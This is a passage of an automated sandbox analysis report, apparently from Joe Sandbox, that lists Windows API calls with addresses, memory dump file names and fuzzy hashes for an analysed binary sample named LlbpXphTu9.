                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                            • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                            • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                                                                            • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                            • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1976402638-0
                                                                                                                                                                            • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                            • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                            • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                                                                              • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4137160315-0
                                                                                                                                                                            • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                            • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                                                                            • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1871949834-0
                                                                                                                                                                            • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                            • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                                                                            • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                            • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0044961A
                                                                                                                                                                            • SendMessageW.USER32 ref: 0044964A
                                                                                                                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                                                                            • _wcslen.LIBCMT ref: 004496BA
                                                                                                                                                                            • _wcslen.LIBCMT ref: 004496C7
                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1624073603-0
                                                                                                                                                                            • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                            • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                            • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                            • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                            • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                                                                            APIs
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1640429340-0
                                                                                                                                                                            • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                            • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                                                                            • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3354276064-0
                                                                                                                                                                            • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                                                            • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                                                                                            • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 752480666-0
                                                                                                                                                                            • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                            • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                                                                            • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                            • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3275902921-0
                                                                                                                                                                            • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                            • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1413079979-0
                                                                                                                                                                            • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                            • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                            • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                                                                            • __getptd.LIBCMT ref: 004141A8
                                                                                                                                                                            • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1803633139-0
                                                                                                                                                                            • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                            • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                                                                            • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                                                                            APIs
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3275902921-0
                                                                                                                                                                            • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                            • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                                                            • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                            • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32 ref: 004554DF
                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3691411573-0
                                                                                                                                                                            • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                            • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                                                                                                            • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
